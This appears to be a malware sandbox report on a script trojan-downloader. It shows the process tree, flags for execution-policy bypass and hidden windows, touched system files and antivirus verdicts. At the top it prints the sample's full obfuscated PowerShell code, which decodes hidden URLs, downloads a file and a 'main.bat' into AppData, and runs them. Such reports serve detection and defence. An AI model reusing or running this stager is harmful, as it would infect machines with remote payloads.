GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\main.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\main.bat |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Lionic | Trojan.Script.Generic.4!c |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | VBS/Agent.QVR |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
Tencent | Script.Trojan-Downloader.Generic.Xdkl |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
DrWeb | Trojan.DownLoader46.24389 |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
ALYac | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
MAX | malware (ai score=82) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |